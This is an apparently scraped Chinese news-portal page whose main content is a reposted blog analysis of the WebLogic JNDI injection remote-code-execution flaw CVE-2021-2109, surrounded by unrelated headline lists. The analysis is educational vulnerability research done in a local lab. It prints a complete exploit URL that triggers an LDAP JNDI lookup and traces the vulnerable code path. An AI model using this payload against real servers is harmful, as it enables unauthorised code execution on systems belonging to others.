最新要闻
- 当前简讯:浙江女子1600公里追到广州找到被偷的爱猫:苹果AirTag定位器立了大功
- 比亚迪豪华MPV成了!腾势D9上月热销7325台:均价41.5万
- 简讯:俞敏洪最新演讲:不喜欢《狂飙》 企业家只想赚钱就会像高启强后患无穷
- 复旦MOSS团队:取名是致敬《流浪地球2》 参数规模约ChatGPT的1/10
- 世界热推荐:跑着跑着会熄火 日产北美召回超80万辆奇骏:车钥匙背锅
- 【全球新要闻】那舅特大桥建成 又一时速350高铁开铺 南宁至玉林仅50分钟
- 3899元起 惠普战66六代锐龙版上架:锐龙7000系列加持
- 世界热议:3月17日开启Beta测试!《暗黑破坏神4》新预告片透露更多游戏内容
- 焦点短讯!拳头《无畏契约》3月14日起不再支持Win7/8/8.1系统:为了打击外挂!
- 全球消息!苹果何时大降价?iPhone 14 Plus成系列销量最差:用户宁愿买安卓
- 焦点信息:寓言诚不欺我!网友拍下现实版“乌鸦喝水”
- 焦点报道:儿子篮球班倒闭家长花1000万买下 网友:这就是钞能力
- 全球热议:999元卷王小金刚!优派推出VX2758显示器:27英寸2K/170Hz
- 15万就能买特斯拉?特斯拉宣布重大目标:成本降低50%
- 哪吒汽车2月份交付10073台 同比大涨41.5%
- 未成年人沉迷短视频得治 TikTok默认限制每天可刷一小时
手机
iphone11大小尺寸是多少?苹果iPhone11和iPhone13的区别是什么?
警方通报辅警执法直播中被撞飞:犯罪嫌疑人已投案
- iphone11大小尺寸是多少?苹果iPhone11和iPhone13的区别是什么?
- 警方通报辅警执法直播中被撞飞:犯罪嫌疑人已投案
- 男子被关545天申国赔:获赔18万多 驳回精神抚慰金
- 3天内26名本土感染者,辽宁确诊人数已超安徽
- 广西柳州一男子因纠纷杀害三人后自首
- 洱海坠机4名机组人员被批准为烈士 数千干部群众悼念
家电
环球观焦点:WebLogic JNDI注入(CVE-2021-2109)
0x01 前言
学习一下 WebLogic JNDI 注入 RCE(CVE-2021-2109)
(资料图)
0x02 环境搭建
和之前 WebLogic 的环境搭建是一致的,本文不再赘述。
不过值得一提的是,我的 weblogic 版本是 10.3.6;需要手动添加\server\lib\consoleapp\webapp\WEB-INF\lib\console.jar
到依赖里面
0x03 漏洞分析与复现
漏洞影响版本与前提条件
Oracle WebLogic Server 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0。
拥有访问/console/consolejndi.portal
页面的用户权限,或者存在 CVE-2020-14883 未授权访问漏洞。关于未授权的漏洞我会放到 WebLogic 的另外一篇文章中再做分析
漏洞原理
WebLogic 的/console/consolejndi.portal
接口可以调用存在 JNDI 注入漏洞的com.bea.console.handles.JndiBindingHandle
类,从而造成 RCE。
漏洞复现
payload 如下
http://127.0.0.1:7001/console/css/%252e%252e%252fconsolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://127.0.0;1:1389/aew0xy;AdminServer%22)
我本地开启了一个 JNDI 的 Evil Class 和 Server
用 payload 打成功
漏洞分析
根据 payload 分析,先从consolejndi.portal
开始看起,.portal
文件就类似于一个 servlet,在consolejndi.portal
中存在 JNDI Binding 操作的处理容器,如图
具体的处理逻辑在/PortalConfig/jndi/jndibinding.portlet
【----帮助网安学习,以下所有学习资料免费领!加vx:yj009991,备注 “博客园” 获取!】
① 网安学习成长路径思维导图 ② 60+网安经典常用工具包 ③ 100+SRC漏洞分析报告 ④ 150+网安攻防实战技术电子书 ⑤ 最权威CISSP 认证考试指南+题库 ⑥ 超1800页CTF实战技巧手册 ⑦ 最新网安大厂面试题合集(含答案) ⑧ APP客户端安全检测指南(安卓+IOS)
去到com.bea.console.actions.jndi.JNDIBindingActioncom.bea.console.actions.jndi.JNDIBindingAction
类中,发现存在一个execute()
方法,疑似存在 jndi 注入的漏洞。
观察需要如何构造恶意 payload,c 是由ConsoleUtils.initNamingContext(serverMBean);
得来,而serverMBean
是通过domainMBean.lookupServer(serverName);
得来,其中一系列关系我将会由下图说明
接着我们自上而下顺序看代码,先是强转了一个JndiBindingHandle
类,这里面getHandleContext()
的逻辑并不复杂,最终会调用 JndiBindingHandle 的构造函数。
如图,我们在 payload 当中的这一段被放进了构造函的type
与objectIdentifier
中,而"ldapxxxx"
这一段会被放在 components 中,由分号分隔
JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle("ldap://127.0.0;1:1389/aew0xy;AdminServer")
继续往下看,我们想要进入 JNDI 注入的那一段代码,需要满足两个条件,一个是serverMBean != null
,另一个是c != null
,我们进到serverMBean
看一下代码逻辑
lookupServer
是DommainMBean
接口的方法,我们去看它的实现类
实际上这里是动态代理调用的,会自动跟进到weblogic.management.jmx.MBeanServerInvocationHandler#invoke
下,其中 method 的值为weblogic.management.configuration.DomainMBean#lookupServer
,它的 method 代码逻辑在实现类当中,也就是weblogic.management.configuration.DomainMBeanImpl#lookupServer
我们需要走到 do while 的逻辑里面,返回 var3,而不是返回 null
通过调试得到 var2 的值为AdminServer
,这里没有其他的值了,原因如图
所以此处要求我们输入的 var1 与AdminServer
相同,回过头去看 var1 是什么呢,var1 其实是serverName
发现 serverName 也是可控的
现在
serverBean != null
没问题,就要看 jndi lookup 的地址是否可控。
很明显,jndi lookup 的地址也是可控的
我们进到JndiBindingHandle
类去看一下set/getComponents()
的逻辑,先调用了HandleImpl#getComponent
跟进
主要逻辑就是在讲,以;
分隔,如此一来,我们就可控 context 与 binding,可以进行 jndi 注入
最后捋一下整体条件
1、;
号隔开 jndi 地址2、serverName 必须为 AdminServer
0x04 漏洞修复
根据 Y4er 师傅这里的说法是,对 Jndi 的黑名单进行了判断,如图
0x05 小结
不算难的一个漏洞,只是环境搭建当时踩了很多坑,欢迎师傅们与我交流踩坑问题,我会竭力帮助。
更多靶场实验练习、网安学习资料,请点击这里>>
-
环球观焦点:WebLogic JNDI注入(CVE-2021-2109)
学习一下WebLogicJNDI注入RCE(CVE-2021-2109),不算难的一个漏洞,只是环境搭建当时踩了很多坑,欢迎...
来源: -
剑指 Offer 64. 求 1 + 2 + … + n(java解题)
leetcode《图解数据结构》剑指Offer64 求1+2+…+n(java解题)的解题思路和java代码,并附上java中常用...
来源: 环球观焦点:WebLogic JNDI注入(CVE-2021-2109)
天天通讯!Java 根据模板导出PDF
从菜鸟程序员到高级架构师,竟然是因为这个字final
剑指 Offer 64. 求 1 + 2 + … + n(java解题)
当前简讯:浙江女子1600公里追到广州找到被偷的爱猫:苹果AirTag定位器立了大功
比亚迪豪华MPV成了!腾势D9上月热销7325台:均价41.5万
简讯:俞敏洪最新演讲:不喜欢《狂飙》 企业家只想赚钱就会像高启强后患无穷
复旦MOSS团队:取名是致敬《流浪地球2》 参数规模约ChatGPT的1/10
世界热推荐:跑着跑着会熄火 日产北美召回超80万辆奇骏:车钥匙背锅
环球头条:Git介绍下载安装以及基本使用
全球新消息丨解释器模式
每日时讯!promethues【centos7】时间同步
What is Point ?
【全球新要闻】那舅特大桥建成 又一时速350高铁开铺 南宁至玉林仅50分钟
3899元起 惠普战66六代锐龙版上架:锐龙7000系列加持
世界热议:3月17日开启Beta测试!《暗黑破坏神4》新预告片透露更多游戏内容
焦点短讯!拳头《无畏契约》3月14日起不再支持Win7/8/8.1系统:为了打击外挂!
论文阅读笔记(四):AS-MLP AN AXIAL SHIFTED MLP ARCHITECTUREFOR VISION
(数据库系统概论|王珊)第七章数据库设计-第五、六节:物理结构设计和数据库的实施和维护
全球消息!苹果何时大降价?iPhone 14 Plus成系列销量最差:用户宁愿买安卓
焦点信息:寓言诚不欺我!网友拍下现实版“乌鸦喝水”
焦点报道:儿子篮球班倒闭家长花1000万买下 网友:这就是钞能力
全球热议:999元卷王小金刚!优派推出VX2758显示器:27英寸2K/170Hz
15万就能买特斯拉?特斯拉宣布重大目标:成本降低50%
哪吒汽车2月份交付10073台 同比大涨41.5%
未成年人沉迷短视频得治 TikTok默认限制每天可刷一小时
“自己造自己” 特斯拉人形机器人亮相!马斯克承认罕见事实
【世界速看料】腾讯新游《黎明觉醒:生机》开放60帧:骁龙888、iPhone 13以上都能开
每日视点!印度男子展示绝技“乌鸦召唤术” 网友:在古代至少巫师级别
读Java性能权威指南(第2版)笔记06_数据库性能JPA&SpringData
全省严查!正在进行!
每日看点!马斯克大力推荐!特斯拉Cybertruck实车亮相:超级未来感
天天消息!马斯克宏图计划公布:储能240TWh 制造投资10万亿美元
日本死亡人数是新生儿数量两倍有多可怕:850万“幽灵屋”遍布全国
信息:特斯拉下一代电机将不需要任何稀土成分!马斯克挑战全球车企
环球新动态:Spark系列 - (5) Spark Shuffle
热消息:Fireasy3 揭秘 -- 万物伊始(依赖注入与服务发现)
全球信息:英语四级阅读技巧
一加Ace 2V 12+256G起步行业罕见:友商还在搞8+128卡价位的版本
实时:Redmi Note 12 Pro极速版12+256G到手1999元:开机就是MIUI 14
造车新势力2月交付量出炉:理想、蔚来、哪吒破万 零跑压力大
【全球速看料】厦门征求意见!过马路玩手机或将罚款50元 你支持吗?
世界快看:东风概念飞行汽车外观曝光!“鸥翼门”相当炫酷
【当前热闻】2018巴彦淖尔国际马拉松
环球焦点!胡明轩:平时杜导叫我和徐杰一起训练 要求我们承担起更多责任
世界快讯:makefile
基于alpine基础镜像构建jdk镜像以及tomcat镜像及业务构建
Linux极简入门系列(六):其它补充
CSS全局关键字
环球聚焦:委员建议隔周三休成热搜第一 网友吵翻 专家:很难行得通
今日热闻!Model 2明天发?这款15万的特斯拉便宜车:马斯克已经说了17年
环球新消息丨LOJ 3276 JOISC 2020 Day2 遗迹 题解 (计数DP)
环球快资讯:MySQL学习笔记-多表查询(上)
当前视讯!量化交易基础 - 011 - 样本外检验
风语筑(603466):上海风语筑文化科技股份有限公司关于股东权益变动比例超过1%的提示性公告
天天观察:希望工程发文感谢《原神》玩家 5天9万多人捐赠240万元
世界聚焦:“刺客”又来了!网友称买到1600元一斤话梅:每颗至少20元
“窄边教科书”上新!戴尔XPS15 9530发布:13代酷睿+RTX 40配8TB SSD
环球微动态丨孟菲斯动物园发大熊猫丫丫新动态 网友:尽快回国!
曝苹果屏下Face ID技术有缺憾:2026年才会趋于完美
C++ STL学习笔记-C++ STL基础
焦点讯息:4-Ribbon负载均衡
信息:可取代eSIM:更完美的iSIM卡来了
二月浏览器大战结果出炉:微软Edge用户数不升反降
头条:《王者荣耀》干将莫邪画中仙皮肤公布:中国古风莫邪绝美
环球微头条丨k8s之list-watch机制、节点调度以及亲和性
全球速讯:记录--虚拟滚动探索与封装
天天百事通!(数据库系统概论|王珊)第七章数据库设计-第四节:逻辑结构设计
焦点热议:Cesium 几何体贴模型 sampleHeight(二十二)
环球滚动:苏富比春拍上海预展即将开展,近150件藏品由谁保驾护航?
全球即时看!蔚来2022年财报公布:全年营收492亿元 同比大涨36%
天天资讯:建议元宵节放假1天:提升人民幸福指数
环球通讯!超19万辆!比亚迪2月新能源销量公布:暴打新势力全家
全球微头条丨2023五一档电影增至五部!哪部对你吸引力更大?
热点!Cesium Transform(二十)
世界速讯:第124篇: 期约Promise
怎么登录新浪微博网页版_如何登陆新浪微博
环球快报:刹车变硬踩不动遭车主集体投诉 铃木召回超7.8万辆汽车
【独家】好利来创始人之子回应开劳斯莱斯摆摊:没想博眼球
天天快播:AI小姐姐比真人还好看? N卡又抓到风口:8GB显存稳定绘图 首选RTX30/40系
春丽今天55岁了!网友:Coser我永远只服成龙大哥
速讯:URLDNS链分析
认识数据标签
每日速递:Python识别图形验证码实战项目
全球播报:记一次CPU占用持续上升问题排查(Nacos动态路由引起)
iOS应用发布ITMS-90704错误解决
荣耀“青海湖技术”揭晓:荣耀Magic5系列全球首发硅碳负极技术
国内专属!新款国产特斯拉Model Y升级悬架:终于不颠了
天天热门:功耗开放470W!影驰名人堂RTX 4080真是生猛
每日热讯!又一游戏成功“入奥”:育碧《舞力全开》入选2023年奥林匹克电子竞技项目
天天头条:女子幼儿园收童子尿煮鸡蛋 吃着香是浙江当地非遗:网友直呼酸爽
今日热闻!中国通才教育:已针对首次公开发售相关指控开展独立调查,将继续停牌
全球百事通!为什么95%的Java程序员人,都是用不好Synchronized?
每日时讯!Python教程:类的派生
你有“ChatGPT综合征”吗:想搞钱,或是失业焦虑?
Python教程:类的继承,什么是继承
加点广告怎么了 爱奇艺新专利可在弹幕中显示广告
环球动态:狂飙8000MHz!朗科Z RGB DDR5-8000 16GB电镀银内存图赏
每日短讯:1:1复刻仿生人手 现实版《西部世界》公司众筹开启
全球头条:5G是高铁 6G就是飞机!工信部:全面推进6G技术研发